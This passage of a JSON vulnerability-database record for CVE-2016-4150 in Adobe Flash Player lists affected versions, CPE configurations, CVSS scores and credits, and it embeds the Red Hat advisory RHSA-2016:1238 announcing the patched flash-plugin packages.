        "trust": 0.3,
        "vendor": "adobe",
        "version": "7"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "6.0.21.0"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.2.202.235"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.2.202.233"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.2.202.229"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.2.202.228"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.2.202.223"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.115.8"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.115.7"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.115.6"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.112.61"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.111.9"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.111.8"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.111.7"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.111.6"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.111.5"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.102.63"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.102.62"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.102.55"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.1.102.228"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "11.0.1.152"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.186.7"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.186.6"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.186.3"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.186.2"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.185.25"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.185.23"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.185.22"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.185.21"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.183.7"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.183.5"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.183.4"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.183.10"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.181.34"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.181.26"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.181.23"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.181.22"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.181.16"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.3.181.14"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.159.1"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.157.51"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.156.12"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.154.28"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.154.27"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.154.25"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.154.24"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.154.18"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.154.13"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.153.1"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.152.33"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.152.32"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.152.21"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.2.152"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.95.2"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.95.1"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.92.8"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.92.10"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.85.3"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.82.76"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.52.15"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.52.14.1"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.106.16"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.105.6"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.102.65"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.1.102.64"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.42.34"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10.0.32.18"
      },
      {
        "model": "flash player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "adobe",
        "version": "10"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "91250"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:adobe:flash_player_desktop_runtime:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "21.0.0.242",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "11.2.202.621",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:adobe:flash_player:*:*:*:*:esr:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "18.0.0.352",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:adobe:flash_player:*:*:*:*:*:edge:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "21.0.0.242",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:adobe:flash_player:*:*:*:*:*:internet_explorer:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "21.0.0.242",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:google:chrome_os:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:adobe:flash_player:*:*:*:*:*:chrome:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "21.0.0.242",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "willJ of Tencent PC Manager, Aleksandar Nikolic of Cisco Talos, kelvinwang of Tencent PC Manager, Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero, LMX of the Qihoo 360 Codesafe Team and Wen Guanxing from Pangu LAB.",
    "sources": [
      {
        "db": "BID",
        "id": "91250"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-4150",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-4150",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "id": "VHN-92969",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-4150",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-4150",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201606-414",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-92969",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-4150",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. This case MS16-083 This is a different vulnerability than the other vulnerabilities listed on the list.It may be affected unspecified. \nAn attacker can exploit these issues to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The former is the default browser included with operating systems prior to Windows 10; the latter is the default browser included with Windows 10, the latest operating system. in the United States. The former is a multimedia player product library; the latter is a cross-platform, browser-based multimedia player product. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Critical: flash-plugin security update\nAdvisory ID:       RHSA-2016:1238-01\nProduct:           Red Hat Enterprise Linux Supplementary\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2016:1238\nIssue date:        2016-06-17\nCVE Names:         CVE-2016-4122 CVE-2016-4123 CVE-2016-4124 \n                   CVE-2016-4125 CVE-2016-4127 CVE-2016-4128 \n                   CVE-2016-4129 CVE-2016-4130 CVE-2016-4131 \n                   CVE-2016-4132 CVE-2016-4133 CVE-2016-4134 \n                   CVE-2016-4135 CVE-2016-4136 CVE-2016-4137 \n                   CVE-2016-4138 CVE-2016-4139 CVE-2016-4140 \n                   CVE-2016-4141 CVE-2016-4142 CVE-2016-4143 \n                   CVE-2016-4144 CVE-2016-4145 CVE-2016-4146 \n                   CVE-2016-4147 CVE-2016-4148 CVE-2016-4149 \n                   CVE-2016-4150 CVE-2016-4151 CVE-2016-4152 \n                   CVE-2016-4153 CVE-2016-4154 CVE-2016-4155 \n                   CVE-2016-4156 CVE-2016-4166 CVE-2016-4171 \n=====================================================================\n\n1. Summary:\n\nAn update for flash-plugin is now available for Red Hat Enterprise Linux 5\nSupplementary and Red Hat Enterprise Linux 6 Supplementary. \n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64\n\n3. \n\nThis update upgrades Flash Player to version 11.2.202.626. These\nvulnerabilities, detailed in the Adobe Security Bulletin listed in the\nReferences section, could allow an attacker to create a specially crafted\nSWF file that would cause flash-plugin to crash, execute arbitrary code, or\ndisclose sensitive information when the victim loaded a page containing the\nmalicious SWF content. (CVE-2016-4122, CVE-2016-4123, CVE-2016-4124,\nCVE-2016-4125, CVE-2016-4127, CVE-2016-4128, CVE-2016-4129, CVE-2016-4130,\nCVE-2016-4131, CVE-2016-4132, CVE-2016-4133, CVE-2016-4134, CVE-2016-4135,\nCVE-2016-4136, CVE-2016-4137, CVE-2016-4138, CVE-2016-4139, CVE-2016-4140,\nCVE-2016-4141, CVE-2016-4142, CVE-2016-4143, CVE-2016-4144, CVE-2016-4145,\nCVE-2016-4146, CVE-2016-4147, CVE-2016-4148, CVE-2016-4149, CVE-2016-4150,\nCVE-2016-4151, CVE-2016-4152, CVE-2016-4153, CVE-2016-4154, CVE-2016-4155,\nCVE-2016-4156, CVE-2016-4166, CVE-2016-4171)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1346665 - flash-plugin: multiple code execution issues fixed in APSB16-18\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5):\n\ni386:\nflash-plugin-11.2.202.626-1.el5_11.i386.rpm\n\nx86_64:\nflash-plugin-11.2.202.626-1.el5_11.i386.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 5):\n\ni386:\nflash-plugin-11.2.202.626-1.el5_11.i386.rpm\n\nx86_64:\nflash-plugin-11.2.202.626-1.el5_11.i386.rpm\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 6):\n\ni386:\nflash-plugin-11.2.202.626-1.el6_8.i686.rpm\n\nx86_64:\nflash-plugin-11.2.202.626-1.el6_8.i686.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 6):\n\ni386:\nflash-plugin-11.2.202.626-1.el6_8.i686.rpm\n\nx86_64:\nflash-plugin-11.2.202.626-1.el6_8.i686.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 6):\n\ni386:\nflash-plugin-11.2.202.626-1.el6_8.i686.rpm\n\nx86_64:\nflash-plugin-11.2.202.626-1.el6_8.i686.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-4122\nhttps://access.redhat.com/security/cve/CVE-2016-4123\nhttps://access.redhat.com/security/cve/CVE-2016-4124\nhttps://access.redhat.com/security/cve/CVE-2016-4125\nhttps://access.redhat.com/security/cve/CVE-2016-4127\nhttps://access.redhat.com/security/cve/CVE-2016-4128\nhttps://access.redhat.com/security/cve/CVE-2016-4129\nhttps://access.redhat.com/security/cve/CVE-2016-4130\nhttps://access.redhat.com/security/cve/CVE-2016-4131\nhttps://access.redhat.com/security/cve/CVE-2016-4132\nhttps://access.redhat.com/security/cve/CVE-2016-4133\nhttps://access.redhat.com/security/cve/CVE-2016-4134\nhttps://access.redhat.com/security/cve/CVE-2016-4135\nhttps://access.redhat.com/security/cve/CVE-2016-4136\nhttps://access.redhat.com/security/cve/CVE-2016-4137\nhttps://access.redhat.com/security/cve/CVE-2016-4138\nhttps://access.redhat.com/security/cve/CVE-2016-4139\nhttps://access.redhat.com/security/cve/CVE-2016-4140\nhttps://access.redhat.com/security/cve/CVE-2016-4141\nhttps://access.redhat.com/security/cve/CVE-2016-4142\nhttps://access.redhat.com/security/cve/CVE-2016-4143\nhttps://access.redhat.com/security/cve/CVE-2016-4144\nhttps://access.redhat.com/security/cve/CVE-2016-4145\nhttps://access.redhat.com/security/cve/CVE-2016-4146\nhttps://access.redhat.com/security/cve/CVE-2016-4147\nhttps://access.redhat.com/security/cve/CVE-2016-4148\nhttps://access.redhat.com/security/cve/CVE-2016-4149\nhttps://access.redhat.com/security/cve/CVE-2016-4150\nhttps://access.redhat.com/security/cve/CVE-2016-4151\nhttps://access.redhat.com/security/cve/CVE-2016-4152\nhttps://access.redhat.com/security/cve/CVE-2016-4153\nhttps://access.redhat.com/security/cve/CVE-2016-4154\nhttps://access.redhat.com/security/cve/CVE-2016-4155\nhttps://access.redhat.com/security/cve/CVE-2016-4156\nhttps://access.redhat.com/security/cve/CVE-2016-4166\nhttps://access.redhat.com/security/cve/CVE-2016-4171\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-18.html\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-03.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXY7HIXlSAg2UNWIIRAmytAJ9KBVDAyt7RbmNznJhC6uA9WwA6tACfSNyo\n/QNQeCm3xe5AByAOnb1Veh0=\n=5kdV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "BID",
        "id": "91250"
      },
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "db": "PACKETSTORM",
        "id": "137517"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-4150",
        "trust": 3.0
      },
      {
        "db": "SECTRACK",
        "id": "1036117",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "91250",
        "trust": 0.4
      },
      {
        "db": "VULHUB",
        "id": "VHN-92969",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-4150",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137517",
        "trust": 0.1
      }
    ],
